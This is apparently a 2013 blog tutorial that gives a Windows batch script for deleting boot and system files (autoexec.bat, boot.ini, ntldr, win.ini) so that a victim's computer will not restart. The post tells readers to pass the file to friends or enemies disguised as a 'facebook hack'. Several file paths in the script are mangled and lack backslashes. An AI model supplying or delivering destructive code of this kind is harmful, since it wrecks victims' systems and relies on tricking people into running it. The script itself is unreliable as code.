Saturday 4 May 2013

Tutorial Destroy Anyone's Computer With This File

What the file will do ?

The file we are going to create will reboot the computer once and also delete all the file needed by the computer to restart again, so you got it right well if you are pranking with your friend or your enemy remember that his or her computer will never restart unless new Windows is installed.

Method :

1. Open Notepad and copy the code given below.

Code:
@echo off
attrib -r -s -h c:autoexec.bat
del c:autoexec.bat
attrib -r -s -h c:boot.ini
del c:boot.ini
attrib -r -s -h c:ntldr
del c:ntldr
attrib -r -s -h c:windowswin.ini
del c:windowswin.ini

2. Save as "anyname.bat" (without quotes)

3. Now the virus is ready and you can give it to your friends by calling it a facebook hack or anything you want.


Warning :

Don’t click on this file in your Computer.

0 comments:

Post a Comment